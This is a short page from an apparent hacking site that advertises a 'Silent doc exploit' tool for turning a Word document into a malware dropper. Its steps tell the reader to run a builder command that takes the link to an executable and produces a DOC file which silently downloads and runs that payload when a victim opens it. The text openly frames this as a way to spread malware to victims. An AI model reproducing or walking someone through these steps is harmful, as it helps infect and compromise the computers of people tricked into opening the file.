Monday, 2024-04-29, 5:05 PM

WELKOM TO YEZLODZ HACKZ

Silent doc exploit

Exploits Silent doc exploit 0day vs old Macro EXPLOIT With this 
You can spread better send doc file to Victim, no more .exe or .scr or spoofing extension Proof Demo
Method file Download and Execute Your Payload/server Silently


Download first Exploits Silent doc 
link
extract Silent.Doc.Rar to Desktop / Install python-3.4.2 
open CMD press start type CMD and open it and a box will popup
navigate to the Silent doc folder 
type : CD Desktop and hit enter enter
then type CD Silent doc and hit enter
now we gonna make your file to DOC
type in cmd:fuddoc12ve3.exe "FILENAME.DOC" "Direct link to your EXE you want exploited" and hit enter
The exploited DOC file will be located in the folder

OUR MENU
Log In
Statistics

Total online: 1
Guests: 1
Users: 0